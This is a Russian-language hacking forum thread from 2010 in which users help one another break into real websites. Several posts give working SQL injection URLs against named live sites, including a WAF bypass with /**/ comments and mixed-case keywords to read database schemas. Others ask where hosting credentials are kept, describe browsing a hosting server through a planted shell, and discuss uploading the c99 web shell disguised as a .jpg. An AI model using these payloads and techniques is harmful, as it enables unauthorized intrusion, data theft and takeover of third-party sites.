Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    .:GOGA:. самый хацкер что ли?
    клац

    после того как клацнешь, посмотри на номер твоего поста
     
  2. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    Что можно сделать с такими правами?)

    [​IMG]

    случайно на одном забугорхостинге нашел - протыкал на своем шелле кнопочку вверх и попал в этот католог все файло и дампы просматривать можно:)
     
    #14182 InfectedM, 18 Jul 2010
    Last edited: 18 Jul 2010
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    и какой ответ ты хочешь услышать? в чем именно твой вопрос конкретно? если сейчас обьяснять тебе что можно делать на серванте с такими правами..я боюсь что на статью потянет..и еще откликнутся еще много добрых молодцев страстно желающие тебе помочь и будут вставлять свои 5 копеек по поводу использования шелла с "такими правам"...
     
  4. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    http://www.site.com/index.php?_a=viewCat&catId=145'

    сайт является уязвимым

    Я не могу подсчитать число столбцов

    уязвимых ошибке

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/site.com/httpdocs/includes/content/viewCat.inc.php on line 41
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a' at line 1
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    все экстрасенсы на отдыхе сейчас, вернись через пару месяцев..а лучше никогда
    вот тебе ответ
    http://www.site.com/index.php?_a=viewCat&catId=145'+правильный синтаксис запроса SQL

    не знаю если поймешь так как ты не русско-язычный..а гугл не сможет перевести, но все твои вопросы попадают под категорию "Пойди туда ,не знаю куда, принеси то, не знаю что"
     
    #14185 Gorev, 18 Jul 2010
    Last edited: 18 Jul 2010
  6. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    Хотелось бы узнать где обычно лежат пароли от Cpanel mysql фтп
    Хотя ,наверно,без знаний линух смысла нет мне туда суватся, пускай пока живет :)
     
    #14186 InfectedM, 18 Jul 2010
    Last edited: 18 Jul 2010
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    config..
     
  8. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =)
    Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий.

    http://aktualnews.com/sport/?id=764'

    select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит.
    Версия 5.0.90-community

    http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+

    Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере.

    возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    auth_root

    http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,column_name,4,5/**/FrOm/**/information_schema.columns--+

    там фильтр на information_schema.tables
     
    _________________________
    #14189 Konqi, 18 Jul 2010
    Last edited: 18 Jul 2010
    2 people like this.
  10. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Konqi
    Спасибо... А ларчик просто открывался =)
    опять не повезло.
    Ладно, поищу что нибудь подходящее =)
     
  11. funt1k

    funt1k Banned

    Joined:
    11 Jul 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Exploit for OpenSSH 3.8

    Ребят, под эту версию есть какие нибудь эксплоиты? весь гугл перерыл - ничего дельного не нашел =(
     
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    _http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,3,4,5/**/FrOm/**/information_schema.`tables`--+
     
    1 person likes this.
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Как можно попасть в админку, если есть запрос при авторизации

    SELECT pass FROM user WHERE username = '[SQL]'



    Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.
     
  14. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Не удается подобрать поля
    Помогите плиз справится
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.arbeitsmarktportal.eu/stellengesuche-anzeigen.php?recordID=1816+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,unhex(hex(version()),38,39,40,41,42,43,44,45+LIMIT+1,1--

    Database Version: 4.1.13
     
    #14195 Gorev, 19 Jul 2010
    Last edited: 19 Jul 2010
    2 people like this.
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    если не получается в одном скрипте реализовать sql, то ищи другие скрипты и пробуй реализовать там, как впринцепи и зделал Gorev
     
    _________________________
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    а поконкретней код как устроен?
     
    _________________________
  18. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    переименовал шелл c99.php на c99.php.jpg
    попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат :mad: можт че не так или админ сильно умный :confused:
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    конечно же все зависит от скрипта через который происходит заливка, не все же скрипты проверяют расширение...у некоторых есть и другие способы защиты от заливки нежелательных файлов

    тыц мышкой
     
    1 person likes this.
  20. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается
    пишет 403


    http://www.site.org/docs/c99madshell.php.jpg
     
Thread Status:
Not open for further replies.